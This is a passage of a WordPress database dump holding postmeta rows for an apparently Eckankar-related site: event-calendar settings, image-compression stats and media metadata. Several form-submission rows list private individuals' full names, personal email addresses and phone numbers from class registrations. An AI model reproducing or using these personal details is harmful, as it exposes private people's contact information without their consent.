WP-Optimize'),(195165,269328,'smush-stats','a:5:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:75692;s:12:\"smushed-size\";i:71792;s:15:\"savings-percent\";d:5.1500000000000003552713678800500929355621337890625;s:10:\"sizes-info\";a:9:{s:4:\"full\";a:2:{s:8:\"original\";i:75692;s:10:\"compressed\";i:71792;}s:6:\"medium\";a:2:{s:8:\"original\";i:15067;s:10:\"compressed\";i:15017;}s:9:\"thumbnail\";a:2:{s:8:\"original\";i:6469;s:10:\"compressed\";i:6403;}s:12:\"medium_large\";a:2:{s:8:\"original\";i:53921;s:10:\"compressed\";i:53553;}s:9:\"thumblist\";a:2:{s:8:\"original\";i:20424;s:10:\"compressed\";i:20279;}s:12:\"thumbrelated\";a:2:{s:8:\"original\";i:46187;s:10:\"compressed\";i:45261;}s:16:\"meccarouselthumb\";a:2:{s:8:\"original\";i:30817;s:10:\"compressed\";i:30608;}s:10:\"gridsquare\";a:2:{s:8:\"original\";i:21731;s:10:\"compressed\";i:21672;}s:8:\"tileview\";a:2:{s:8:\"original\";i:24230;s:10:\"compressed\";i:24228;}}}'),(195166,269329,'_edit_last','2'),(195167,269329,'mec_cost_auto_calculate','0'),(195168,269329,'mec_style_per_event','global'),(195169,269329,'mec_trailer_url',''),(195170,269329,'mec_trailer_title',''),(195171,269329,'mec_start_datetime','2022-12-10 11:00 AM'),(195172,269329,'mec_end_datetime','2022-12-10 12:00 PM'),(195173,269329,'mec_sequence','2'),(195176,269329,'mec_banner','a:0:{}'),(195177,269330,'protect_children',''),(195178,269330,'mec_color',''),(195179,269330,'mec_location_id','185'),(195180,269330,'mec_dont_show_map','0'),(195181,269330,'mec_organizer_id','1'),(195182,269330,'mec_read_more',''),(195183,269330,'mec_more_info',''),(195184,269330,'mec_more_info_title',''),(195185,269330,'mec_more_info_target','_self'),(195186,269330,'mec_cost',''),(195187,269330,'mec_currency','a:0:{}'),(195188,269330,'mec_additional_organizer_ids','a:0:{}'),(195189,269330,'mec_additional_location_ids','a:0:{}'),(195190,269330,'mec_date','a:4:{s:5:\"start\";a:4:{s:4:\"date\";s:10:\"2023-11-19\";s:4:\"hour\";s:2:\"10\";s:7:\"minutes\";s:2:\"30\";s:4:\"ampm\";s:2:\"AM\";}s:3:\"end\";a:4:{s:4:\"date\";s:10:\"2023-11-19\";s:4:\"hour\";s:2:\"11\";s:7:\"minutes\";s:2:\"30\";s:4:\"ampm\";s:2:\"AM\";}s:7:\"comment\";s:0:\"\";s:6:\"repeat\";a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}}'),(195191,269330,'mec_repeat','a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}'),(195192,269330,'mec_certain_weekdays','a:0:{}'),(195193,269330,'mec_allday','0'),(195194,269330,'one_occurrence','0'),(195195,269330,'mec_hide_time','0'),(195196,269330,'mec_hide_end_time','0'),(195197,269330,'mec_comment',''),(195198,269330,'mec_timezone','global'),(195199,269330,'mec_countdown_method','global'),(195200,269330,'mec_public','1'),(195201,269330,'mec_start_date','2023-11-19'),(195202,269330,'mec_start_time_hour','10'),(195203,269330,'mec_start_time_minutes','30'),(195204,269330,'mec_start_time_ampm','AM'),(195205,269330,'mec_start_day_seconds','37800'),(195206,269330,'mec_end_date','2023-11-19'),(195207,269330,'mec_end_time_hour','11'),(195208,269330,'mec_end_time_minutes','30'),(195209,269330,'mec_end_time_ampm','AM'),(195210,269330,'mec_end_day_seconds','41400'),(195211,269330,'mec_repeat_status','0'),(195212,269330,'mec_repeat_type',''),(195213,269330,'mec_repeat_interval','1'),(195214,269330,'mec_repeat_end',''),(195215,269330,'mec_repeat_end_at_occurrences','9'),(195216,269330,'mec_repeat_end_at_date',''),(195217,269330,'mec_advanced_days','a:0:{}'),(195218,269330,'mec_in_days',''),(195219,269330,'mec_not_in_days',''),(195220,269330,'mec_hourly_schedules','a:0:{}'),(195221,269330,'mec_booking','a:19:{s:24:\"bookings_limit_unlimited\";s:1:\"0\";s:14:\"bookings_limit\";s:0:\"\";s:28:\"bookings_minimum_per_booking\";s:1:\"1\";s:28:\"roles_discount_administrator\";s:0:\"\";s:21:\"roles_discount_editor\";s:0:\"\";s:21:\"roles_discount_author\";s:0:\"\";s:26:\"roles_discount_contributor\";s:0:\"\";s:25:\"roles_discount_subscriber\";s:0:\"\";s:24:\"roles_discount_organizer\";s:0:\"\";s:25:\"roles_discount_uram_guest\";s:0:\"\";s:24:\"bookings_all_occurrences\";s:1:\"0\";s:33:\"bookings_all_occurrences_multiple\";s:1:\"0\";s:26:\"show_booking_form_interval\";s:0:\"\";s:35:\"stop_selling_after_first_occurrence\";s:1:\"0\";s:11:\"auto_verify\";s:6:\"global\";s:12:\"auto_confirm\";s:6:\"global\";s:29:\"bookings_booking_button_label\";s:0:\"\";s:29:\"bookings_user_limit_unlimited\";s:1:\"1\";s:19:\"bookings_user_limit\";s:0:\"\";}'),(195222,269330,'mec_tickets','a:0:{}'),(195223,269330,'mec_fees_global_inheritance','1'),(195224,269330,'mec_fees','a:0:{}'),(195225,269330,'mec_ticket_variations_global_inheritance','1'),(195226,269330,'mec_ticket_variations','a:0:{}'),(195227,269330,'mec_reg_fields_global_inheritance','1'),(195228,269330,'mec_reg_fields','a:0:{}'),(195229,269330,'mec_bfixed_fields','a:0:{}'),(195230,269330,'mec_op','a:0:{}'),(195231,269330,'mec_fields','a:0:{}'),(195232,269330,'mec_event_status','EventScheduled'),(195233,269330,'mec_moved_online_link',''),(195234,269330,'mec_cancelled_reason',''),(195235,269330,'mec_display_cancellation_reason_in_single_page',''),(195236,269330,'boldgrid_hide_page_title','0'),(195237,269330,'mec_notifications','a:4:{s:20:\"booking_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:0:\"\";s:7:\"content\";s:0:\"\";}s:18:\"email_verification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:27:\"Please verify your booking.\";s:7:\"content\";s:153:\"<p>Hi %%name%%,</p>\r\n<p>Please verify your booking by clicking on following link:</p>\r\n<p>%%verification_link%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}s:18:\"admin_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:26:\"A new booking is received.\";s:7:\"content\";s:195:\"<p>Dear Admin,</p>\r\n<p>A new booking is received. Please check and confirm it as soon as possible.</p>\r\n<p>%%admin_link%%</p>\r\n<p>%%attendees_full_info%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}s:16:\"certificate_send\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:27:\"Event Attendee Certificates\";s:7:\"content\";s:252:\"<p>Hi %%name%%,</p>\r\n<p>Congratulations for successfully attending / completing the event %%event_title%%.<br />\r\nClick the following link to download or print your PDF certificate.</p>\r\n<p>%%certificate_link%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}}'),(195238,269330,'passster_activate_global_protection',NULL),(195239,269330,'passster_activate_protection',NULL),(195240,269330,'passster_protection_type','password'),(195241,269330,'boldgrid_in_page_containers','1'),(195255,269330,'_dp_original','269329'),(195244,269330,'passster_area_shortcode',''),(195245,269330,'mec_cost_auto_calculate','0'),(195246,269330,'mec_style_per_event','global'),(195247,269330,'mec_trailer_url',''),(195248,269330,'mec_trailer_title',''),(195249,269330,'mec_start_datetime','2023-11-19 10:30 AM'),(195250,269330,'mec_end_datetime','2023-11-19 11:30 AM'),(195251,269330,'mec_sequence','8'),(195252,269330,'mec_event_gallery','a:0:{}'),(195253,269330,'mec_related_events','a:0:{}'),(195254,269330,'mec_banner','a:0:{}'),(195256,269330,'_edit_lock','1698980425:2'),(195257,269330,'_edit_last','2'),(195311,269330,'_thumbnail_id','269338'),(195312,269339,'_wp_attached_file','2023/10/video-rebroadcast-lite-6.jpg'),(195313,269339,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:779;s:6:\"height\";i:437;s:4:\"file\";s:36:\"2023/10/video-rebroadcast-lite-6.jpg\";s:8:\"filesize\";i:89754;s:5:\"sizes\";a:8:{s:6:\"medium\";a:5:{s:4:\"file\";s:36:\"video-rebroadcast-lite-6-350x196.jpg\";s:5:\"width\";i:350;s:6:\"height\";i:196;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:19843;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:36:\"video-rebroadcast-lite-6-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:7136;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:36:\"video-rebroadcast-lite-6-768x431.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:431;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:70979;}s:9:\"thumblist\";a:5:{s:4:\"file\";s:36:\"video-rebroadcast-lite-6-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:21897;}s:12:\"thumbrelated\";a:5:{s:4:\"file\";s:36:\"video-rebroadcast-lite-6-500x437.jpg\";s:5:\"width\";i:500;s:6:\"height\";i:437;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:52751;}s:16:\"meccarouselthumb\";a:5:{s:4:\"file\";s:36:\"video-rebroadcast-lite-6-474x324.jpg\";s:5:\"width\";i:474;s:6:\"height\";i:324;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:38721;}s:10:\"gridsquare\";a:5:{s:4:\"file\";s:36:\"video-rebroadcast-lite-6-391x260.jpg\";s:5:\"width\";i:391;s:6:\"height\";i:260;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:27561;}s:8:\"tileview\";a:5:{s:4:\"file\";s:36:\"video-rebroadcast-lite-6-300x400.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:24221;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(195314,269339,'original-file','2023/10/video-rebroadcast-lite-6-updraft-pre-smush-original.jpg'),(195315,269339,'smush-complete','1'),(195316,269339,'smush-info','The file was compressed from 87.65 KB to 80.74 KB, saving 7.88 percent, using WP-Optimize'),(195317,269339,'smush-stats','a:5:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:89754;s:12:\"smushed-size\";i:82677;s:15:\"savings-percent\";d:7.87999999999999989341858963598497211933135986328125;s:10:\"sizes-info\";a:9:{s:4:\"full\";a:2:{s:8:\"original\";i:89754;s:10:\"compressed\";i:82677;}s:6:\"medium\";a:2:{s:8:\"original\";i:19843;s:10:\"compressed\";i:19662;}s:9:\"thumbnail\";a:2:{s:8:\"original\";i:7136;s:10:\"compressed\";i:7136;}s:12:\"medium_large\";a:2:{s:8:\"original\";i:70979;s:10:\"compressed\";i:69994;}s:9:\"thumblist\";a:2:{s:8:\"original\";i:21897;s:10:\"compressed\";i:21883;}s:12:\"thumbrelated\";a:2:{s:8:\"original\";i:52751;s:10:\"compressed\";i:52172;}s:16:\"meccarouselthumb\";a:2:{s:8:\"original\";i:38721;s:10:\"compressed\";i:38111;}s:10:\"gridsquare\";a:2:{s:8:\"original\";i:27561;s:10:\"compressed\";i:27411;}s:8:\"tileview\";a:2:{s:8:\"original\";i:24221;s:10:\"compressed\";i:24165;}}}'),(195270,269333,'_field_654','fred'),(195271,269333,'_field_652','bell'),(195272,269333,'_field_653','fredwbell@gmail.com'),(195273,269333,'_field_651','(303) 495-0109'),(195274,269333,'_field_656','The ECK Satsang Discourses  Second Series - STARTS IN NOVEMBER -- 1st Tuesday at 700 pm - Zoom'),(195275,269333,'_field_649',''),(195276,269333,'_form_id','61'),(195277,269333,'_seq_num','105'),(195278,269334,'_field_654','Elaine'),(195279,269334,'_field_652','Dahlgren'),(195280,269334,'_field_653','elainedahl@yahoo.com'),(195281,269334,'_field_651','(801) 674-5348'),(195282,269334,'_field_656','The ECK Dream 1 Discourses - STARTS IN JANUARY -- 1st Thursday at 700 pm - Zoom'),(195283,269334,'_field_649',''),(195284,269334,'_form_id','61'),(195285,269334,'_seq_num','106'),(195286,269335,'_field_654','Karen'),(195287,269335,'_field_652','Smith'),(195288,269335,'_field_653','k-a-r-e-n@comcast.net'),(195289,269335,'_field_651','(303) 921-8781'),(195290,269335,'_field_656','The ECK Dream 1 Discourses - STARTS IN JANUARY -- 1st Thursday at 700 pm - Zoom'),(195291,269335,'_field_649',''),(195292,269335,'_form_id','61'),(195293,269335,'_seq_num','107'),(195294,269336,'_field_654','Bonnie'),(195295,269336,'_field_652','Gibbons'),(195296,269336,'_field_653','bonniegib@gmail.com'),(195297,269336,'_field_651','(970) 690-2211'),(195298,269336,'_field_656','The ECK Dream 1 Discourses - STARTS IN JANUARY -- 1st Thursday at 700 pm - Zoom'),(195299,269336,'_field_649',''),(195300,269336,'_form_id','61'),(195301,269336,'_seq_num','108'),(195309,269338,'_wp_attached_file','2023/11/video-rebroadcast-7.jpg'),(195310,269338,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:780;s:6:\"height\";i:448;s:4:\"file\";s:31:\"2023/11/video-rebroadcast-7.jpg\";s:8:\"filesize\";i:83044;s:5:\"sizes\";a:8:{s:6:\"medium\";a:5:{s:4:\"file\";s:31:\"video-rebroadcast-7-341x196.jpg\";s:5:\"width\";i:341;s:6:\"height\";i:196;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:18375;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:31:\"video-rebroadcast-7-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:6669;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:31:\"video-rebroadcast-7-768x441.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:441;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:68232;}s:9:\"thumblist\";a:5:{s:4:\"file\";s:31:\"video-rebroadcast-7-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:20082;}s:12:\"thumbrelated\";a:5:{s:4:\"file\";s:31:\"video-rebroadcast-7-500x448.jpg\";s:5:\"width\";i:500;s:6:\"height\";i:448;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:46068;}s:16:\"meccarouselthumb\";a:5:{s:4:\"file\";s:31:\"video-rebroadcast-7-474x324.jpg\";s:5:\"width\";i:474;s:6:\"height\";i:324;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:35606;}s:10:\"gridsquare\";a:5:{s:4:\"file\";s:31:\"video-rebroadcast-7-391x260.jpg\";s:5:\"width\";i:391;s:6:\"height\";i:260;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:25459;}s:8:\"tileview\";a:5:{s:4:\"file\";s:31:\"video-rebroadcast-7-300x400.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:21490;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(195318,269338,'original-file','2023/11/video-rebroadcast-7-updraft-pre-smush-original.jpg'),(195319,269338,'smush-complete','1'),(195320,269338,'smush-info','The file was compressed from 81.10 KB to 75.10 KB, saving 7.4 percent, using WP-Optimize'),(195321,269338,'smush-stats','a:5:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:83044;s:12:\"smushed-size\";i:76900;s:15:\"savings-percent\";d:7.4000000000000003552713678800500929355621337890625;s:10:\"sizes-info\";a:9:{s:4:\"full\";a:2:{s:8:\"original\";i:83044;s:10:\"compressed\";i:76900;}s:6:\"medium\";a:2:{s:8:\"original\";i:18375;s:10:\"compressed\";i:18115;}s:9:\"thumbnail\";a:2:{s:8:\"original\";i:6669;s:10:\"compressed\";i:6669;}s:12:\"medium_large\";a:2:{s:8:\"original\";i:68232;s:10:\"compressed\";i:66882;}s:9:\"thumblist\";a:2:{s:8:\"original\";i:20082;s:10:\"compressed\";i:19992;}s:12:\"thumbrelated\";a:2:{s:8:\"original\";i:46068;s:10:\"compressed\";i:44730;}s:16:\"meccarouselthumb\";a:2:{s:8:\"original\";i:35606;s:10:\"compressed\";i:35303;}s:10:\"gridsquare\";a:2:{s:8:\"original\";i:25459;s:10:\"compressed\";i:24972;}s:8:\"tileview\";a:2:{s:8:\"original\";i:21490;s:10:\"compressed\";i:21193;}}}'),(195322,269340,'_wp_old_slug','the-power-of-grace-2-918'),(195323,269340,'protect_children',''),(195324,269340,'mec_color',''),(195325,269340,'mec_location_id','187'),(195326,269340,'mec_dont_show_map','0'),(195327,269340,'mec_organizer_id','1'),(195328,269340,'mec_read_more',''),(195329,269340,'mec_more_info',''),(195330,269340,'mec_more_info_title',''),(195331,269340,'mec_more_info_target','_self'),(195332,269340,'mec_cost',''),(195333,269340,'mec_currency','a:0:{}'),(195334,269340,'mec_additional_organizer_ids','a:0:{}'),(195335,269340,'mec_additional_location_ids','a:0:{}'),(195336,269340,'mec_date','a:4:{s:5:\"start\";a:4:{s:4:\"date\";s:10:\"2023-11-15\";s:4:\"hour\";s:1:\"6\";s:7:\"minutes\";s:2:\"30\";s:4:\"ampm\";s:2:\"PM\";}s:3:\"end\";a:4:{s:4:\"date\";s:10:\"2023-11-15\";s:4:\"hour\";s:1:\"7\";s:7:\"minutes\";s:2:\"30\";s:4:\"ampm\";s:2:\"PM\";}s:7:\"comment\";s:0:\"\";s:6:\"repeat\";a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}}'),(195337,269340,'mec_repeat','a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}'),(195338,269340,'mec_certain_weekdays','a:0:{}'),(195339,269340,'mec_allday','0'),(195340,269340,'one_occurrence','0'),(195341,269340,'mec_hide_time','0'),(195342,269340,'mec_hide_end_time','0'),(195343,269340,'mec_comment',''),(195344,269340,'mec_timezone','global'),(195345,269340,'mec_countdown_method','global'),(195346,269340,'mec_public','1'),(195347,269340,'mec_start_date','2023-11-15'),(195348,269340,'mec_start_time_hour','6'),(195349,269340,'mec_start_time_minutes','30'),(195350,269340,'mec_start_time_ampm','PM'),(195351,269340,'mec_start_day_seconds','66600'),(195352,269340,'mec_end_date','2023-11-15'),(195353,269340,'mec_end_time_hour','7'),(195354,269340,'mec_end_time_minutes','30'),(195355,269340,'mec_end_time_ampm','PM'),(195356,269340,'mec_end_day_seconds','70200'),(195357,269340,'mec_repeat_status','0'),(195358,269340,'mec_repeat_type',''),(195359,269340,'mec_repeat_interval','1'),(195360,269340,'mec_repeat_end',''),(195361,269340,'mec_repeat_end_at_occurrences','9'),(195362,269340,'mec_repeat_end_at_date',''),(195363,269340,'mec_advanced_days','a:0:{}'),(195364,269340,'mec_in_days',''),(195365,269340,'mec_not_in_days',''),(195366,269340,'mec_hourly_schedules','a:0:{}'),(195367,269340,'mec_booking','a:19:{s:24:\"bookings_limit_unlimited\";s:1:\"0\";s:14:\"bookings_limit\";s:0:\"\";s:28:\"bookings_minimum_per_booking\";s:1:\"1\";s:28:\"roles_discount_administrator\";s:0:\"\";s:21:\"roles_discount_editor\";s:0:\"\";s:21:\"roles_discount_author\";s:0:\"\";s:26:\"roles_discount_contributor\";s:0:\"\";s:25:\"roles_discount_subscriber\";s:0:\"\";s:24:\"roles_discount_organizer\";s:0:\"\";s:25:\"roles_discount_uram_guest\";s:0:\"\";s:24:\"bookings_all_occurrences\";s:1:\"0\";s:33:\"bookings_all_occurrences_multiple\";s:1:\"0\";s:26:\"show_booking_form_interval\";s:0:\"\";s:35:\"stop_selling_after_first_occurrence\";s:1:\"0\";s:11:\"auto_verify\";s:6:\"global\";s:12:\"auto_confirm\";s:6:\"global\";s:29:\"bookings_booking_button_label\";s:0:\"\";s:29:\"bookings_user_limit_unlimited\";s:1:\"1\";s:19:\"bookings_user_limit\";s:0:\"\";}'),(195368,269340,'mec_tickets','a:0:{}'),(195369,269340,'mec_fees_global_inheritance','1'),(195370,269340,'mec_fees','a:0:{}'),(195371,269340,'mec_ticket_variations_global_inheritance','1'),(195372,269340,'mec_ticket_variations','a:0:{}'),(195373,269340,'mec_reg_fields_global_inheritance','1'),(195374,269340,'mec_reg_fields','a:0:{}'),(195375,269340,'mec_bfixed_fields','a:0:{}'),(195376,269340,'mec_op','a:0:{}'),(195377,269340,'mec_fields','a:0:{}'),(195378,269340,'mec_event_status','EventScheduled'),(195379,269340,'mec_moved_online_link',''),(195380,269340,'mec_cancelled_reason',''),(195381,269340,'mec_display_cancellation_reason_in_single_page',''),(195382,269340,'boldgrid_hide_page_title','0'),(195383,269340,'mec_notifications','a:4:{s:20:\"booking_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:0:\"\";s:7:\"content\";s:0:\"\";}s:18:\"email_verification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:27:\"Please verify your booking.\";s:7:\"content\";s:153:\"<p>Hi %%name%%,</p>\r\n<p>Please verify your booking by clicking on following link:</p>\r\n<p>%%verification_link%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}s:18:\"admin_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:26:\"A new booking is received.\";s:7:\"content\";s:195:\"<p>Dear Admin,</p>\r\n<p>A new booking is received. Please check and confirm it as soon as possible.</p>\r\n<p>%%admin_link%%</p>\r\n<p>%%attendees_full_info%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}s:16:\"certificate_send\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:27:\"Event Attendee Certificates\";s:7:\"content\";s:252:\"<p>Hi %%name%%,</p>\r\n<p>Congratulations for successfully attending / completing the event %%event_title%%.<br />\r\nClick the following link to download or print your PDF certificate.</p>\r\n<p>%%certificate_link%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}}'),(195384,269340,'passster_activate_global_protection',''),(195385,269340,'passster_activate_protection',''),(195386,269340,'passster_protection_type','password'),(195387,269340,'boldgrid_in_page_containers','1'),(195388,269340,'_dp_original','267696'),(195389,269340,'passster_area_shortcode',''),(195390,269340,'_wp_old_date','2023-01-14'),(195391,269340,'mec_cost_auto_calculate','0'),(195392,269340,'mec_style_per_event','global'),(195393,269340,'mec_trailer_url',''),(195394,269340,'mec_trailer_title',''),(195395,269340,'mec_start_datetime','2023-11-15 06:30 PM'),(195396,269340,'mec_end_datetime','2023-11-15 07:30 PM'),(195397,269340,'mec_sequence','3'),(195398,269340,'mec_event_gallery','a:0:{}'),(195399,269340,'mec_related_events','a:0:{}'),(195400,269340,'mec_banner','a:0:{}'),(195401,269340,'_edit_lock','1699108905:15'),(195402,269340,'_edit_last','15'),(195403,269340,'_thumbnail_id','269342'),(195404,269342,'_wp_attached_file','2023/11/SpiritualMeetingPlace.webp'),(195405,269342,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:600;s:6:\"height\";i:338;s:4:\"file\";s:34:\"2023/11/SpiritualMeetingPlace.webp\";s:8:\"filesize\";i:9672;s:5:\"sizes\";a:7:{s:6:\"medium\";a:5:{s:4:\"file\";s:34:\"SpiritualMeetingPlace-348x196.webp\";s:5:\"width\";i:348;s:6:\"height\";i:196;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:3352;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:34:\"SpiritualMeetingPlace-150x150.webp\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:1902;}s:9:\"thumblist\";a:5:{s:4:\"file\";s:34:\"SpiritualMeetingPlace-300x300.webp\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:4166;}s:12:\"thumbrelated\";a:5:{s:4:\"file\";s:34:\"SpiritualMeetingPlace-500x338.webp\";s:5:\"width\";i:500;s:6:\"height\";i:338;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:6754;}s:16:\"meccarouselthumb\";a:5:{s:4:\"file\";s:34:\"SpiritualMeetingPlace-474x324.webp\";s:5:\"width\";i:474;s:6:\"height\";i:324;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:5926;}s:10:\"gridsquare\";a:5:{s:4:\"file\";s:34:\"SpiritualMeetingPlace-391x260.webp\";s:5:\"width\";i:391;s:6:\"height\";i:260;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:4546;}s:8:\"tileview\";a:5:{s:4:\"file\";s:34:\"SpiritualMeetingPlace-300x338.webp\";s:5:\"width\";i:300;s:6:\"height\";i:338;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:4834;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(195406,269343,'_field_654','Eric'),(195407,269343,'_field_652','Volpe'),(195408,269343,'_field_653','volpesoul@icloud.com'),(195409,269343,'_field_651','(720) 569-6116'),(195410,269343,'_field_656','The Precepts of Eckankar - STARTS IN NOVEMBER -- 3rd Sunday at 900  1015 am - Zoom'),(195411,269343,'_field_649',''),(195412,269343,'_form_id','61'),(195413,269343,'_seq_num','109'),(195414,269344,'_field_654','Karina'),(195415,269344,'_field_652','Vol-e'),(195416,269344,'_field_653','kvbiz@icloud.com'),(195417,269344,'_field_651','(720) 530-8116'),(195418,269344,'_field_656','The Precepts of Eckankar - STARTS IN NOVEMBER -- 3rd Sunday at 900  1015 am - Zoom'),(195419,269344,'_field_649',''),(195420,269344,'_form_id','61'),(195421,269344,'_seq_num','110'),(195422,269346,'_field_654','Candyce'),(195423,269346,'_field_652','Rushold'),(195424,269346,'_field_653','crushold@mac.com'),(195425,269346,'_field_651','(970) 222-6234'),(195426,269346,'_field_656','The ECK Satsang Discourses  First Series - STARTS IN NOVEMBER -- 1st Sunday at 1200  130 pm - Zoom'),(195427,269346,'_field_649',''),(195428,269346,'_form_id','61'),(195429,269346,'_seq_num','111'),(195430,269350,'_edit_lock','1699121361:2'),(195431,269350,'_edit_last','2'),(195432,269350,'boldgrid_hide_page_title','0'),(195433,269350,'boldgrid_in_page_containers','1'),(195434,269352,'_edit_lock','1699375638:2'),(195435,269352,'_edit_last','2'),(195436,269352,'_oembed_e3aa312d159f91b3d35b5228806d4ba2','<iframe title=\"Discover Eckankar and Advanced Spiritual Living\" width=\"1489\" height=\"838\" src=\"https://www.youtube.com/embed/s78XVcM7HWI?feature=oembed\" frameborder=\"0\" allow=\"accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture; web-share\" allowfullscreen></iframe>'),(195437,269352,'_oembed_time_e3aa312d159f91b3d35b5228806d4ba2','1699119181'),(195438,269352,'boldgrid_hide_page_title','0'),(195439,269352,'boldgrid_in_page_containers','1'),(195440,269352,'_oembed_bff9b01f87e9e8963e733f0ecf5b2049','<iframe title=\"Discover Eckankar and Advanced Spiritual Living\" width=\"500\" height=\"281\" src=\"https://www.youtube.com/embed/s78XVcM7HWI?feature=oembed\" frameborder=\"0\" allow=\"accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture; web-share\" 